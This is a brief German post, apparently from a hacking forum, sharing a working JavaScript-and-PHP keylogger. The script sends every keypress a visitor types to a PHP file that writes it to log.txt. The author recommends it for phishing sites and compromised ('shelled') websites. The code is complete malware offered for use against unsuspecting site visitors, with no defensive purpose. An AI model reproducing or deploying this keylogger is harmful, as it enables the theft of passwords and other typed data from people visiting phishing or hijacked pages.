hab was ganz Brauchbares gefunden: einen Javascript-Keylogger
index.php
<script type="text/javascript"> document.onkeypress = function(log) { log = log || window.event; if (String.fromCharCode(log.charCode)) { var http = new XMLHttpRequest(); var input = encodeURI(String.fromCharCode(log.charCode)); http.open("POST", "keylogger.php", true); http.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http.send("inp=" + input); } } </script>
keylogger.php
<?php $keylog = $_POST['inp']; if (!empty($keylog)): $fopen = @fopen('log.txt', 'a+'); @fwrite($fopen, $keylog); @fclose($fopen); endif; ?>
Die log.txt wird automatisch erstellt.
Brauchbar für: Phishing-Sites, shelled Sites
hf